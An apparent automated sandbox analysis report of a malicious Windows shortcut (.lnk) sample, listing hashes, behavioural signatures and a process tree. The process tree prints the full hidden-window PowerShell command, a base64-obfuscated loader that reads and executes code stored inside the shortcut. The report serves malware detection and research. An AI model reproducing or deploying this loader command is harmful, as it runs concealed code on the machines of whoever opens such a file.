Analysis
-
max time kernel
121s -
max time network
126s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
22/05/2024, 20:15
Static task
static1
Behavioral task
behavioral1
Sample
687b73b76e0fbcf849bcf8b6fa115720_JaffaCakes118.lnk
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
687b73b76e0fbcf849bcf8b6fa115720_JaffaCakes118.lnk
Resource
win10v2004-20240508-en
General
-
Target
687b73b76e0fbcf849bcf8b6fa115720_JaffaCakes118.lnk
-
Size
4KB
-
MD5
687b73b76e0fbcf849bcf8b6fa115720
-
SHA1
bc477f041578f3661f92bab600cc3a83baa5f535
-
SHA256
16d9a43bc7a5445df46356beebb592312b3c05e1570ff0341221649d2131d3cd
-
SHA512
99227886a148d29c414a8bdddbdd769969e3577f707e47783a765e33fdd939b5a0ed06a408ddd4f905a0ff87bbfad785a4a9aca8b75b22912ef537e598a0337e
-
SSDEEP
48:81udOcDT8AwV2dDlW1vffNwi5c4qcJMIlDqRv:8Id/h4Nd5RzCAD
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2580 POwerSheLL.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2580 POwerSheLL.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2580 POwerSheLL.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 2240 wrote to memory of 2580 2240 cmd.exe 29 PID 2240 wrote to memory of 2580 2240 cmd.exe 29 PID 2240 wrote to memory of 2580 2240 cmd.exe 29
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\687b73b76e0fbcf849bcf8b6fa115720_JaffaCakes118.lnk1⤵
- Suspicious use of WriteProcessMemory
PID:2240 -
C:\Windows\system32\WinDow~1\v1.0\POwerSheLL.exe"C:\Windows\system32\WinDow~1\v1.0\POwerSheLL.exe" -w hidden $s='LWpvaW4oKDM2LDUzLDYxLDM2LDEwNCwxMTEsMTE1LDExNiw0NiwxMTcsMTA1LDQ2LDExNCw5NywxMTksMTE3LDEwNSw0NiwxMTksMTA1LDExMCwxMDAsMTExLDExOSwxMTYsMTA1LDExNiwxMDgsMTAxLDU5LDczLDEwMiw0MCwzMywzNiw1Myw0NiwxMDEsMTEwLDEwMCwxMTUsMTE5LDEwNSwxMTYsMTA0LDQwLDM5LDQ2LDEwOCwxMTAsMTA3LDM5LDQxLDQxLDEyMywzNiw1Myw0Myw2MSwzOSw0NiwxMDgsMTEwLDEwNywzOSwxMjUsMzYsNTMsNjEsMTAzLDEwNSwzMiwzNiw1Myw1OSwxMTUsNTUsNDksMzIsNDAsMTAzLDk5LDMyLDM2LDUzLDEyNCwxMTUsMTAxLDEwOCwxMDEsOTksMTE2LDMyLDQ1LDEwOCwzMiw0OSw0MSl8JXtbaW50XSRfLUFTW2NoYXJdfSl8aWV4';Function s71{param($o);iex ([text.encoding]::utf8.getstring([convert]::frombase64string($o)))}s71 $s2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2580
-